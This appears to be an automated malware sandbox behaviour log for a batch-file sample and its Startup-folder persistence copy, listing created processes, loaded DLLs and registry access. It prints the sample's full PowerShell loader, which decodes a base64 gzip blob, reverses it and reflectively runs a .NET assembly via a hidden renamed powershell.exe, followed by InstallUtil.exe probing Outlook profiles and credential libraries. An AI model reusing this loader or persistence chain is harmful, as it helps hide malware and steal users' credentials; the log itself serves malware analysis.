Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: atl.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: msisip.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: wshext.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: atl.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: msisip.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: wshext.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: ilZhNx3JAc.bat Static file information: File size 1411997 > 1048576
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
